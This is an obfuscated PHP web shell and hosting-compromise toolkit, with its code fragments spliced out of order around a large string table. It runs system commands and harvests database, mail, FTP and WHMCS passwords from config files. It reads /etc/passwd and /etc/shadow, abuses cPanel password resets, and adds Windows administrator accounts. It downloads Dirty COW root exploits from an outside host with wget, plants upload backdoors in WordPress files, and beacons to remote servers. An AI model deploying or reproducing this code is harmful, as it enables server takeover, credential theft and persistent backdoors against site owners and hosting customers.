if (!empty($EQ0fI[0x1])) {
echo $GLOBALS[ð][0x17a] . $EQ0fI[0x1] . $GLOBALS[ð][0x17b];
$ogEo3++;
}
if (preg_match($GLOBALS[ð][0x11a], $Rd6Xn) || preg_match($GLOBALS[ð][0x11b], $srSx9)) {
if (!empty($H3Dnq[0x1])) {
echo $GLOBALS[ð][0x11c] . $H3Dnq[0x1] . $GLOBALS[ð][0x11d];
$ogEo3++;
} elseif (!empty($qRVjf[0x1])) {
echo $GLOBALS[ð][0x11e] . $qRVjf[0x1] . $GLOBALS[ð][0x11f];
$ogEo3++;
}
}
if (!empty($oDKH4[0x1]) && !preg_match($GLOBALS[ð][0x18a], $oDKH4[0x1])) {
echo $GLOBALS[ð][0x18b] . $oDKH4[0x1] . $GLOBALS[ð][0x18c];
$ogEo3++;
} elseif (!empty($ow9vj[0x1]) && !preg_match($GLOBALS[ð][0x18d], $ow9vj[0x1])) {
echo $GLOBALS[ð][0x18e] . $ow9vj[0x1] . $GLOBALS[ð][0x18f];
$ogEo3++;
}
if (!empty($eZeM_[0x1]) && !preg_match($GLOBALS[ð][0x124], $eZeM_[0x1])) {
echo $GLOBALS[ð][0x125] . $eZeM_[0x1] . $GLOBALS[ð][0x126];
$ogEo3++;
} elseif (!empty($l5zPA[0x1]) && !preg_match($GLOBALS[ð][0x127], $l5zPA[0x1])) {
echo $GLOBALS[ð][0x128] . $l5zPA[0x1] . $GLOBALS[ð][0x129];
$ogEo3++;
}
if (!empty($MQNcp[0x1]) && !preg_match($GLOBALS[ð][0x184], $MQNcp[0x1])) {
echo $GLOBALS[ð][0x185] . $MQNcp[0x1] . $GLOBALS[ð][0x186];
$ogEo3++;
} elseif (!empty($KTQVw[0x1]) && !preg_match($GLOBALS[ð][0x187], $KTQVw[0x1])) {
echo $GLOBALS[ð][0x188] . $KTQVw[0x1] . $GLOBALS[ð][0x189];
$ogEo3++;
}
if (!empty($pWfU0[0x1]) && preg_match($GLOBALS[ð][0x121], $srSx9)) {
echo $GLOBALS[ð][0x122] . $kX5Kz . $GLOBALS[ð][0x123];
}
if (!empty($eBwm4[0x1]) && preg_match($GLOBALS[ð][0x13f], $srSx9)) {
echo $GLOBALS[ð][0x140] . $kX5Kz . $GLOBALS[ð][0x141];
}
}
$qdMec -= 0xa;
if ($qdMec >= 0x2) {
$qdMec /= 0x2;
}
if ($qdMec > $ogEo3 && trim($_POST[$GLOBALS[ð][0x10d]]) != $GLOBALS[ð][0x10e]) {
echo "\n<error>404</error>";
}
if ($yp2PP > 0) {
echo "\n<br><wordpress>{$yp2PP}</wordpress><br>\n";
}
if ($BU0zm > 0) {
echo "\n<br><joomla>{$BU0zm}</joomla><br>\n";
}
if ($lQymy > 0) {
echo "\n<br><opencart>{$lQymy}</opencart><br>\n";
}
}
function FvBEN($T4JMK, $f_2D8)
{
mkdir($GLOBALS[ð][0x196]);
$Mb5nI = $GLOBALS[ð][0x197];
global $W6Z5Y;
$oxjzQ = explode($GLOBALS[ð][0x85], $_SERVER[$GLOBALS[ð][0x195]]);
$Bl19g = $W6Z5Y . $_SERVER[$GLOBALS[ð][0x192]] . str_replace(end($oxjzQ), "root/{$f_2D8}", $_SERVER[$GLOBALS[ð][0x193]]);
if (!file_exists("root/{$f_2D8}")) {
sU59q("root/{$f_2D8}", $T4JMK);
Su59q($GLOBALS[ð][0x194], "Options All\n\nAddType application/x-httpd-cgi .pl\n\nAddHandler cgi-script .pl\nAddHandler cgi-script .pl");
chmod("root/{$f_2D8}", 0755);
}
return $Bl19g;
}
function BM1lJ()
{
global $XG7BU;
$ghUMy = UFeQC($GLOBALS[ð][0x1ec]);
if (!$ghUMy) {
$urRH1 = fW1yE($GLOBALS[ð][0x1ea]);
if (!preg_match($GLOBALS[ð][0x1e8], $urRH1)) {
$urRH1 = fW1YE($GLOBALS[ð][0x1e9]);
}
$zBOmi = FvBeN($urRH1, $GLOBALS[ð][0x1eb]);
$ghUMy = fW1ye($zBOmi);
}
if (preg_match($GLOBALS[ð][0x1ed], $ghUMy)) {
echo "<root><ip>{$XG7BU}</ip><port><br>22</port><user><br>root</user><password><br>0</password></root>\n";
} else {
echo "Error3-Root";
}
}
function IjJzN($kX5Kz, $sD1Ai)
{
if (preg_match($GLOBALS[ð][0x54], $sD1Ai)) {
preg_match($GLOBALS[ð][0x58], $sD1Ai, $tr1Sr);
$tr1Sr = $tr1Sr[0x1];
$gNjTh = SMVyq($kX5Kz . $GLOBALS[ð][0x55] . $tr1Sr);
$sD1Ai = SMvyQ($kX5Kz);
$a3FtC = $GLOBALS[ð][0x57];
$Q5WED = strpos($sD1Ai, $a3FtC) + strlen($a3FtC);
$sD1Ai = $GLOBALS[ð][0x59] . substr($sD1Ai, $Q5WED);
unlink($GLOBALS[ð][0x56]);
}
return $sD1Ai;
}
function woB4r()
{
$XEv3Q = $GLOBALS[ð][0x252];
global $kw7Hz;
$MMvEZ = $GLOBALS[ð][0x1B0] . $XEv3Q[0x12] . $XEv3Q[0x11] . $XEv3Q[0x10] . strtolower($XEv3Q[0x0]) . strtolower($XEv3Q[0x33]) . $GLOBALS[ð][0x1AF] . strtolower($XEv3Q[0x1]) . $XEv3Q[0x12]. $XEv3Q[0x79] . $XEv3Q[0x7] . strtolower($XEv3Q[0x59]) . strtolower($XEv3Q[0x1]). $XEv3Q[0x10];
if (function_exists($GLOBALS[ð][0x24c])) {
$r2z84 = curl_init();
curl_setopt($r2z84, CURLOPT_RETURNTRANSFER, !0);
curl_setopt($r2z84, CURLOPT_URL, EMGKI($GLOBALS[ð][0x24d]) . $GLOBALS[ð][0x105] . $GLOBALS[ð][0x85] . emgKi($MMvEZ) . $GLOBALS[ð][0x85] . eMgKi($GLOBALS[ð][0x24e]) . $GLOBALS[ð][0x105] . EmgKI($GLOBALS[ð][0x24f]) . $GLOBALS[ð][0x250]);
curl_setopt($r2z84, CURLOPT_TIMEOUT, 0x9);
curl_setopt($r2z84, CURLOPT_CONNECTTIMEOUT, 0x9);
curl_setopt($r2z84, CURLOPT_USERAGENT, $GLOBALS[ð][0x251]);
curl_setopt($r2z84, CURLOPT_REFERER, $_SERVER[$GLOBALS[ð][0x1de]] . $kw7Hz);
if (curl_exec($r2z84) != $GLOBALS[ð][0x2]) {
curl_close($r2z84);
return;
}
curl_close($r2z84);
}
if (function_exists($GLOBALS[ð][0x253]) && function_exists($GLOBALS[ð][0x254])) {
$r2z84 = array($GLOBALS[ð][0x227] => array($GLOBALS[ð][0x255] => $GLOBALS[ð][0x238], $GLOBALS[ð][0x256] => $GLOBALS[ð][0x257] . $_SERVER[$GLOBALS[ð][0x258]] . $kw7Hz . $GLOBALS[ð][0x259] . $GLOBALS[ð][0x25a]));
file_get_contents(eMGKi($GLOBALS[ð][0x25b]) . $GLOBALS[ð][0x105] . $GLOBALS[ð][0x105] . emgKI($MMvEZ) . $GLOBALS[ð][0x85] . Emgki($GLOBALS[ð][0x25c]) . $GLOBALS[ð][0x85] . EMgKI($GLOBALS[ð][0x25d]) . $GLOBALS[ð][0x25e], !1, stream_context_create($r2z84));
}
return;
}
$YAaFV = strval(basename("/var/www/html/bkv8.txt"));
$H2CpY = explode($GLOBALS[ð][0x53], $YAaFV);
$YAaFV = $H2CpY[0] . $GLOBALS[ð][0x1ba];
$Wu7is = ufeqC($YAaFV);
if (trim($_SERVER[$GLOBALS[ð][0x1dd]]) == $GLOBALS[ð][0x2] || $_SERVER[$GLOBALS[ð][0x1de]] == $GLOBALS[ð][0x1df] || $_SERVER[$GLOBALS[ð][0x1e0]] == $GLOBALS[ð][0x1e1] || !preg_match($GLOBALS[ð][0x1e2], strval($_SERVER[$GLOBALS[ð][0x1e3]]))) {
SU59q($YAaFV, Emgki(str_rot13(emGKI($Wu7is))));
}
function VZQId()
{
function X4gL0($O2ar5, $t0DY2)
{
$wmx5s = curl_init();
curl_setopt($wmx5s, CURLOPT_URL, $O2ar5);
curl_setopt($wmx5s, CURLOPT_HEADER, !0);
curl_setopt($wmx5s, CURLOPT_RETURNTRANSFER, 0x1);
curl_setopt($wmx5s, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($wmx5s, CURLOPT_CONNECTTIMEOUT, $t0DY2);
curl_setopt($wmx5s, CURLOPT_TIMEOUT, $t0DY2);
curl_setopt($wmx5s, CURLOPT_FOLLOWLOCATION, 0x1);
curl_setopt($wmx5s, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($wmx5s, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($wmx5s, CURLOPT_USERAGENT, $_SERVER[$GLOBALS[ð][0xf9]]);
$xM2hz = curl_exec($wmx5s);
curl_close($wmx5s);
return $xM2hz;
}
function NrmHZ($x3Uog, $qCpsN)
{
if (preg_match($GLOBALS[ð][0xe5], $x3Uog)) {
if ($qCpsN) {
$gqcAE = A7gCN($GLOBALS[ð][0xe9]);
if (!$gqcAE) {
$gqcAE = FW1YE($GLOBALS[ð][0xe7]);
sU59q($GLOBALS[ð][0xe8], $gqcAE);
}
a7Gcn($GLOBALS[ð][0xea]);
a7gcn($GLOBALS[ð][0xe6]);
} else {
$jEIS7 = FW1Ye($GLOBALS[ð][0xed]);
if (!preg_match($GLOBALS[ð][0xeb], $jEIS7)) {
$jEIS7 = fW1Ye($GLOBALS[ð][0xec]);
}
$kX5Kz = fVbeN($jEIS7, $GLOBALS[ð][0xee]);
X4gl0($kX5Kz, 0x1e);
}
} else {
if ($qCpsN) {
$gqcAE = a7GcN($GLOBALS[ð][0xef]);
if (!$gqcAE) {
$gqcAE = fW1yE($GLOBALS[ð][0xf2]);
su59q($GLOBALS[ð][0xf3], $gqcAE);
}
a7gcN($GLOBALS[ð][0xf1]);
A7gCn($GLOBALS[ð][0xf0]);
} else {
$VparV = fw1Ye($GLOBALS[ð][0xf4]);
if (!preg_match($GLOBALS[ð][0xf6], $VparV)) {
$VparV = fW1YE($GLOBALS[ð][0xf7]);
}
$kX5Kz = FvbeN($VparV, $GLOBALS[ð][0xf5]);
x4Gl0($kX5Kz, 0x1e);
}
}
echo $GLOBALS[ð][0xf8];
}
$qCpsN = a7gcN($GLOBALS[ð][0xd8]);
global $x3Uog;
if (preg_match($GLOBALS[ð][0xd9], $x3Uog) || preg_match($GLOBALS[ð][0xda], $x3Uog) || preg_match($GLOBALS[ð][0xdb], $x3Uog) || preg_match($GLOBALS[ð][0xdc], $x3Uog) || preg_match($GLOBALS[ð][0xdd], $x3Uog) || preg_match($GLOBALS[ð][0xde], $x3Uog) || preg_match($GLOBALS[ð][0xdf], $x3Uog)) {
NrMhZ($x3Uog, $qCpsN);
} elseif (preg_match($GLOBALS[ð][0xe0], $x3Uog)) {
if (!preg_match($GLOBALS[ð][0xe1], $x3Uog) && !preg_match($GLOBALS[ð][0xe2], $x3Uog)) {
NrMhz($x3Uog, $qCpsN);
} else {
echo $GLOBALS[ð][0xe3];
}
} else {
echo $GLOBALS[ð][0xe4];
}
}
function D6MNI()
{
global $GEgR8;
global $WnpSY;
$z0tRT = glob("/home{$GEgR8}{$WnpSY}" . $GLOBALS[ð][0x76], GLOB_ONLYDIR);
foreach ($z0tRT as $LOmS0) {
$NlktG = explode($GLOBALS[ð][0x85], $LOmS0);
$u_HWU = $NlktG[count($NlktG) - 0x1];
$g<?php
error_reporting("\0\0\17\3\30");
define('ð', 'ÃÇ’');
$GLOBALS[ð] = array(0 => "<html>Working</html>", 1 => "\n", 2 => "", 3 => "\n", 4 => "resets", 5 => "reseta", 6 => "accesshash", 7 => "https://localhost:2096", 8 => "https://localhost:2087", 9 => "resets", 10 => "reseta", 11 => "accesshash", 12 => "/resetpass/", 13 => "resets", 14 => "reseta", 15 => "COOKIE.txt", 16 => "<error>Reset Password Disabled</error>", 17 => "https://localhost:2083", 18 => "/cPanel/", 19 => "http://localhost:2082", 20 => "http://localhost:2086", 21 => "http://localhost:2095", 22 => "<error>There is no cPanel</error>", 23 => "smtp", 24 => "up", 25 => "upload", 26 => "zip", 27 => "index", 28 => "info", 29 => "domains", 30 => "password", 31 => "root", 32 => "smtps", 33 => "rdp", 34 => "check", 35 => "injection", 36 => "mass", 37 => "../", 38 => "www.", 39 => "www.", 40 => "email", 41 => "email", 42 => "code", 43 => "COOKIE.txt", 44 => "COOKIE.txt", 45 => "<error>Reset Password Vulnerability closed</error>", 46 => "/warn-invalid-answer-puzzle/", 47 => "email:", 48 => "/error-resetpass-disabled/", 49 => "<error>Error-two</error>", 50 => "COOKIE.txt", 51 => "action", 52 => "puzzle", 53 => "user", 54 => "answer", 55 => "debug", 56 => "puzzle-guess-input", 57 => "login", 58 => "Send+Security+Code", 59 => "user", 60 => "login", 61 => "Reset+Password", 62 => "/warn-invalid-answer-puzzle/", 63 => "file", 64 => "name", 65 => "file", 66 => "tmp_name", 67 => "./", 68 => "<backdoor>", 69 => "</backdoor>", 70 => "file_put_contents", 71 => "a", 72 => "COOKIE.txt", 73 => "HTTP_USER_AGENT", 74 => "COOKIE.txt", 75 => "https://ipwhois.app/json/", 76 => "country", 77 => "org", 78 => "/etc/passwd", 79 => ":", 80 => "<font color=\"green\"><center>[+] mycnf </center> </font><br>", 81 => "/etc/passwd", 82 => "<font color=\"green\"><center>[+] mycnf </center> </font><br>", 83 => ".", 84 => "/Warning:/", 85 => "/cdn-cgi/phish-bypass?u=/&atok=", 86 => "COOKIE.txt", 87 => "<?php", 88 => "#name=\"atok\" value=\"(.*)\">#", 89 => "<?php", 90 => "<ip><font color=\"blue\"><center>", 91 => "</center></font><br></ip>", 92 => "<country><center>", 93 => "</center><br></country>", 94 => "<uname><font color=\"red\"><center>", 95 => "</center></font><br></uname>", 96 => "<php><center>", 97 => "</center><br></php>", 98 => "<domains><center>", 99 => "</center><br></domains>", 100 => "<hosting><center>", 101 => "</center><br></hosting>", 102 => "<cp><font color=\"green\"><center>[+] cPanel</center> </font><br></cp>", 103 => "/vhosts/", 104 => "<cp><font color=\"green\"><center>[+] vHosts</center> </font><br></cp>", 105 => "<cp><font color=\"red\"><center>[-] There is no cPanel or vHosts.</center> </font><br></cp>", 106 => "/Windows/", 107 => "<server><font color=\"red\"><center>[-] Windows</center> </font><br></server>", 108 => "<server><font color=\"green\"><center>[+] Linux</center> </font><br></server>", 109 => "<domain><font color=\"red\"><center>", 110 => "</center></font><br></domain>", 111 => "<pwd><font color=\"blue\"><center>", 112 => "</center></font><br></pwd>", 113 => "posix_getegid", 114 => "?", 115 => "name", 116 => "uid", 117 => "gid", 118 => "/etc/*", 119 => "/smtp/", 120 => "/fox/", 121 => "/etc/", 122 => "/shadow", 123 => ":16249:::::", 124 => "\r\n", 125 => "\$6\$roottn\$", 126 => ":", 127 => "/etc/", 128 => "/shadow", 129 => "/ TEST/", 130 => "<error>Error-SMTP</error>", 131 => "/etc/", 132 => "/shadow", 133 => "/", 134 => "/filemanager/", 135 => "/Location: \\/cpsess/", 136 => "/\\/home/", 137 => "user", 138 => "pass", 139 => "login_submit", 140 => "Log in", 141 => "/login/", 142 => "/Unknown App Requested/", 143 => "/<title>Forbidden<\\/title>/", 144 => "/json-api/", 145 => "/successfully/", 146 => "/successfully/", 147 => "\n<br> ./DoneAdmin ", 148 => "Error-RDP2", 149 => "\n<br> ./DoneAdd ", 150 => "net localgroup Administrators ", 151 => " /add", 152 => "Error-RDP1", 153 => "^", 154 => "#", 155 => "net user ", 156 => " ", 157 => " /add", 158 => "WIN", 159 => "<t>", 160 => "</t>", 161 => "Error-RDP3", 162 => "administrator", 163 => "abcdefghijklmnopqrstuvwxyz", 164 => "error_log", 165 => "SERVER_ADDR", 166 => "127.0.0.1", 167 => "#10\\.(.*)\\.(.*)\\.(.*)#", 168 => "SERVER_ADDR", 169 => "/192\\.168\\./", 170 => "SERVER_ADDR", 171 => "HTTP_HOST", 172 => "SERVER_NAME", 173 => "PHP_SELF", 174 => "SERVER_ADDR", 175 => "SERVER_NAME", 176 => "PHP_SELF", 177 => "user", 178 => "action", 179 => "seccode", 180 => "debug", 181 => "confirm", 182 => "action", 183 => "password", 184 => "user", 185 => "password", 186 => "alpha", 187 => "both", 188 => "nonalpha", 189 => "both", 190 => "confirm", 191 => "code", 192 => "|", 193 => "/roundcube/", 194 => "#Location: /(.*)/webmail#", 195 => "#orde\",\"url\":\"/(.*)/horde/#", 196 => "#oundcube\",\"url\":\"/(.*)/3rdparty/#", 197 => "#href=\"/(.*)/horde/#", 198 => "#href=\"/(.*)/3rdparty/#", 199 => "#window.cp_security_token = \"/(.*)\";#", 200 => "#dispatchSettingURL= \"/(.*)/execute/#", 201 => "Error-three", 202 => "COOKIE.txt", 203 => "#bold\">(.*)<\\/p>#", 204 => "#bold\">(.*)<\\/p>#", 205 => "user", 206 => "pass", 207 => "login_submit", 208 => "Log in", 209 => ".", 210 => "..", 211 => "...", 212 => "#bold\">(.*)<\\/p>#", 213 => "Error-three", 214 => "COOKIE.txt", 215 => "HTTP_HOST", 216 => "pwd", 217 => "/ 2015 /", 218 => "/ 2014 /", 219 => "/ 2013 /", 220 => "/ 2012 /", 221 => "/ 2011 /", 222 => "/ 2010 /", 223 => "/ 2009 /", 224 => "/ 2016 /", 225 => "/ Dec /", 226 => "/ Nov /", 227 => "Error2-Root", 228 => "Error2-Root", 229 => "/ i686/", 230 => "./dc-i686.txt 0", 231 => "http://uploaderfiles.com/.L/dc-i686", 232 => "dc-i686.txt", 233 => "wget http://uploaderfiles.com/.L/dc-i686 -O dc-i686.txt", 234 => "chmod +x dc-i686.txt", 235 => "/bin\\/bash/", 236 => "https://textbin.net/raw/mf3kc5bflo", 237 => "http://uploaderfiles.com/.S/dirtyc0wi686.txt", 238 => "root.pl", 239 => "wget http://uploaderfiles.com/.L/dc-n -O dc-n.txt", 240 => "./dc-n.txt 0", 241 => "chmod +x dc-n.txt", 242 => "http://uploaderfiles.com/.L/dc-n", 243 => "dc-n.txt", 244 => "http://uploaderfiles.com/.S/dirtyc0wN.txt", 245 => "root.pl", 246 => "/bin\\/bash/", 247 => "https://textbin.net/raw/v8tio626o2", 248 => "./Done", 249 => "HTTP_USER_AGENT", 250 => "HTTPS", 251 => "HTTPS", 252 => "on", 253 => "https://", 254 => "http://", 255 => "../", 256 => "./", 257 => "..", 258 => "JumpF0x", 259 => "well-known", 260 => "HTTP_HOST", 261 => "/", 262 => "/_autoindex/", 263 => "#<a href=\"(.*).txt\">#", 264 => "\n<error>101</error>", 265 => "/https:/", 266 => "https://", 267 => "http://", 268 => "#href=\"(.*?).txt\"#", 269 => "action1", 270 => "404", 271 => "\n<error>404</error>", 272 => "#'mysql://(.*)@localhost/#", 273 => "#'DB_PASSWORD', \"(.*)\"#", 274 => "#db_password=\"(.*)\"#", 275 => "#'password' => '(.*)',#", 276 => "#'DBPASS','(.*)'#", 277 => "#password\t= '(.*)'#", 278 => "#db_password = \"(.*)\"#", 279 => "#\\MAIL_PASSWORD=\"(.*)\"#", 280 => "#password = '(.*)'#", 281 => "#\\SMTP_PASSWORD=\"(.*)\"#", 282 => "/cPanel/", 283 => "/\\[client\\]/", 284 => "<br><password>", 285 => "</password>\n", 286 => "<br><password>", 287 => "</password>\n", 288 => "#dbpass = \"(.*)\"#", 289 => "/encryption_hash/", 290 => "<br><whmcs>", 291 => "</whmcs>\n", 292 => "/null/", 293 => "<br><password>", 294 => "</password>\n", 295 => "/null/", 296 => "<br><password>", 297 => "</password>\n", 298 => "#smtppass = '(.*)'#", 299 => "#db['pass'] = \"(.*)\";#", 300 => "#password_localhost = \"(.*)\"#", 301 => "#'DB_USERNAME', '(.*)'#", 302 => "/\\/admin\\//", 303 => "#\\MAIL_PASSWORD=(.*)#", 304 => "#ftp_pass = '(.*)'#", 305 => "#\\\$password = '(.*)'#", 306 => "#\"_db_pass_\", \"(.*)\"#", 307 => "/http:/", 308 => "/https:/", 309 => ".txt", 310 => "/\\//", 311 => "http://", 312 => ".txt", 313 => ".txt", 314 => "#senha = \"(.*)\"#", 315 => "#config\\['SQL_PASSWORD'\\] = '(.*)';#", 316 => "#'DB_PASS', '(.*)'#", 317 => "#'DB_PASSWORD', '(.*)'#", 318 => "#password=(.*)#", 319 => "/encryption_hash/", 320 => "<br><whmcs>", 321 => "</whmcs>\n", 322 => "#dbpasswd = '(.*)'#", 323 => "#\\DB_PASSWORD=(.*)#", 324 => "#'_DB_PASSWD_', '(.*)'#", 325 => "#\\SMTP_PASSWORD=(.*)#", 326 => "#'password' => '(.*)',#", 327 => "<br><password>", 328 => "</password>\n", 329 => "<br><password>", 330 => "</password>\n", 331 => "<br><password>", 332 => "</password>\n", 333 => "<br><password>", 334 => "</password>\n", 335 => "<br><password>", 336 => "</password>\n", 337 => "<br><password>", 338 => "</password>\n", 339 => "<br><password>", 340 => "</password>\n", 341 => "<br><password>", 342 => "</password>\n", 343 => "<br><password>", 344 => "</password>\n", 345 => "<br><password>", 346 => "</password>\n", 347 => "<br><password>", 348 => "</password>\n", 349 => "<br><password>", 350 => "</password>\n", 351 => "password", 352 => "<br><password>", 353 => "</password>\n", 354 => "password", 355 => "<br><password>", 356 => "</password>\n", 357 => "<br><password>", 358 => "</password>\n", 359 => "<br><password>", 360 => "</password>\n", 361 => "<br><password>", 362 => "</password>\n", 363 => "<br><password>", 364 => "</password>\n", 365 => "<br><password>", 366 => "</password>\n", 367 => "<br><password>", 368 => "</password>\n", 369 => "<br><password>", 370 => "</password>\n", 371 => "<br><password>", 372 => "</password>\n", 373 => "<br><password>", 374 => "</password>\n", 375 => "#\\DB_PASSWORD=\"(.*)\"#", 376 => "<br><password>", 377 => "</password>\n", 378 => "<br><password>", 379 => "</password>\n", 380 => "#password'] = '(.*)'#", 381 => "#password=\"(.*)\"#", 382 => "#db_password = '(.*)'#", 383 => "#password = \"(.*)\";#", 384 => "#dbpass = '(.*)';#", 385 => "#:(.*)#", 386 => "<br><password>", 387 => "</password>\n", 388 => "/null/", 389 => "<br><password>", 390 => "</password>\n", 391 => "/null/", 392 => "<br><password>", 393 => "</password>\n", 394 => "/null/", 395 => "<br><password>", 396 => "</password>\n", 397 => "/null/", 398 => "<br><password>", 399 => "</password>\n", 400 => "#'DB_USER', '(.*)'#", 401 => "url", 402 => "HTTP_HOST", 403 => "REQUEST_URI", 404 => "root/.htaccess", 405 => "REQUEST_URI", 406 => "root", 407 => "T3B0aW9ucyBBbGwKCkFkZFR5cGUgYXBwbGljYXRpb24veC1odHRwZC1jZ2kgLnBsCgpBZGRIYW5kbGVyIGNnaS1zY3JpcHQgLnBsCkFkZEhhbmRsZXIgY2dpLXNjcmlwdCAucGw=", 408 => "abcdefghijklmnopqrstuvwxyz", 409 => "012345678901234567890123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!#%^*_-=/?.!#%^*_-=/?.!#%^*_-=/?.!#%^*_-=/?.", 410 => "code", 411 => "COOKIE.txt", 412 => "y", 413 => "s", 414 => "b", 415 => "a", 416 => "d", 417 => "u", 418 => "f", 419 => "q", 420 => "k", 421 => "p", 422 => "l", 423 => "z", 424 => "h", 425 => "b", 426 => "i", 427 => "f", 428 => "j", 429 => "v", 430 => "p", 431 => "x", 432 => "v", 433 => "k", 434 => "x", 435 => "h", 436 => "y", 437 => "z", 438 => "REQUEST_URI", 439 => "/\\[client\\]/", 440 => "#password=(.*)#", 441 => "#password=\"(.*)\"#", 442 => ".php", 443 => "HTTP_HOST", 444 => "wp-admin", 445 => "wp-includes", 446 => "wp-includes/", 447 => "wp-admin/", 448 => ".php", 449 => "<backdoor>", 450 => "?", 451 => "</backdoor>", 452 => "../", 453 => "./", 454 => "index.php", 455 => "123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", 456 => "PD9waHA=", 457 => " error_reporting(0); if(isset(\$_GET['", 458 => "'])){ echo \"<form method='POST' enctype='multipart/form-data'><input type='file' name='file' /> <input type='submit' value='upload' /></form>\"; move_uploaded_file(\$_FILES['file']['tmp_name'], \$_FILES['file']['name']); exit(0); } ", 459 => "Pz4=", 460 => "/akhmhcij/", 461 => "/tjwlltii/", 462 => "/jsbochsf/", 463 => "/lmhelqpg/", 464 => "@[^\\w]@", 465 => "@[0-9]@", 466 => "@[A-Z]@", 467 => "@[a-z]@", 468 => "COOKIE.txt", 469 => "exec", 470 => "passthru", 471 => "system", 472 => "shell_exec", 473 => "r", 474 => "file_put_contents", 475 => "w", 476 => "display_errors", 477 => "HTTP_HOST", 478 => "HTTP_HOST", 479 => "127.0.0.1", 480 => "HTTP_HOST", 481 => "localhost", 482 => "/action=/", 483 => "REQUEST_URI", 484 => "action", 485 => "log_errors", 486 => "#/home/(.*)/public_html/#", 487 => "#/home/(.*)/public_html/#", 488 => "/bin\\/bash/", 489 => "https://textbin.net/raw/ja7gk4nuq3", 490 => "http://uploaderfiles.com/.S/passwd.txt", 491 => "pwd.pl", 492 => "/etc/passwd", 493 => "/root:ro.k.OmOlAkM2/", 494 => "Error3-Root", 495 => "\$6\$roottn\$", 496 => " TEST", 497 => "# ", 498 => " TEST\r\n", 499 => "V\t2\n\nArchive\nDrafts\nSent\nspam\nTrash", 500 => "3 V1578724087 N1 G6789ba31f76a195e040b0000cb0407e2", 501 => " TEST\r\n", 502 => "# ", 503 => " TEST\r\n", 504 => "123456789abcdefghijklmnopqrstuvwxyz", 505 => "mail", 506 => "5e196afc0", 507 => "info", 508 => "admin", 509 => "supervisor", 510 => "administrator", 511 => "contact", 512 => "call", 513 => "mail", 514 => "email", 515 => "support", 516 => "site", 517 => "website", 518 => "user", 519 => "director", 520 => "manager", 521 => "chief", 522 => "executive", 523 => "leader", 524 => "supports", 525 => "backing", 526 => "prop", 527 => "backup", 528 => "shore", 529 => "upholding", 530 => "help", 531 => "back-up", 532 => "host", 533 => "hosting", 534 => "clients", 535 => "client", 536 => "member", 537 => "2147483647C\n0 0", 538 => ":16249:::::", 539 => "\r\n", 540 => "index.php", 541 => "index.html", 542 => "index.htm", 543 => "index", 544 => "./Done", 545 => "/etc/named.conf", 546 => "<error># can't ReaD -> [ /etc/named.conf ]</error>", 547 => "#named/(.*?).db#", 548 => "<error>can't get domains.</error>", 549 => "file_get_contents", 550 => "stream_context_create", 551 => "http", 552 => "method", 553 => "GET", 554 => "header", 555 => "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36\r\n", 556 => "api2google.com/apis-explorer", 557 => "http", 558 => "method", 559 => "GET", 560 => "header", 561 => "Sec-Fetch-User: ", 562 => "fopen", 563 => "stream_get_contents", 564 => "stream_context_create", 565 => "r", 566 => "http", 567 => "method", 568 => "GET", 569 => "header", 570 => "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36\r\n", 571 => "curl_exec", 572 => "https://", 573 => "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36", 574 => "wget --header=\"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36\" ", 575 => " -O ", 576 => "/tmp/", 577 => "123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", 578 => ".txt", 579 => "file_get_contents", 580 => "/var/cpanel/resellers", 581 => "/var/cpanel/resellers", 582 => "<font color=\"green\"><center>[+] Accesshash </center> </font><br>\\n", 583 => "<font color=\"green\"><center>[+] Accesshash </center> </font><br>\\n", 584 => "123456789abcdefghijklmnopqrstuvwxyz", 585 => "<font color=\"green\"><center>[+] Accesshash </center> </font><br>\\n", 586 => "//", 587 => "//", 588 => "curl_exec", 589 => "zttv:", 590 => "cii", 591 => "rtp", 592 => ".min.css", 593 => "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36", 594 => "RTLCSS is a framework for transforming Cascading Style Sheets (CSS) from Left-To-Right (LBR) to (PXJ) Right-To-Left (RTL).", 595 => "file_get_contents", 596 => "stream_context_create", 597 => "method", 598 => "header", 599 => "referer: ", 600 => "HTTP_HOST", 601 => "\r\n", 602 => "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36\r\n", 603 => "zttv:", 604 => "cii", 605 => "rtp", 606 => ".min.css", 607 => "cat ", 608 => "file_get_contents", 609 => "fopen", 610 => "stream_get_contents", 611 => "implode", 612 => "file", 613 => "file", 614 => "implode", 615 => "fname", 616 => "fname", 617 => "sname", 618 => "<?php", 619 => "sname", 620 => "<successfully>Uploaded successfully.</successfully>", 621 => "file", 622 => "name", 623 => "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", 624 => "/.htaccess", 625 => "Options +Indexes", 626 => "file", 627 => "name", 628 => "tmp_name", 629 => "action", 630 => "H*", 631 => "<?php ", 632 => "?>", 633 => "http://", 634 => "http://", 635 => "action");
error_reporting(0);
@ini_set($GLOBALS[ð][0xa4], NULL);
@ini_set($GLOBALS[ð][0x1e5], 0);
@ini_set($GLOBALS[ð][0x1dc], 0);
echo "<html>Working</html>";
function A7gcn($bXPN_)
{
$iXhzk = $GLOBALS[ð][0x2];
if (function_exists($GLOBALS[ð][0x1d5])) {
@exec($bXPN_, $iXhzk);
$iXhzk = @join($GLOBALS[ð][0x1], $iXhzk);
} elseif (function_exists($GLOBALS[ð][0x1d6])) {
ob_start();
@passthru($bXPN_);
$iXhzk = ob_get_clean();
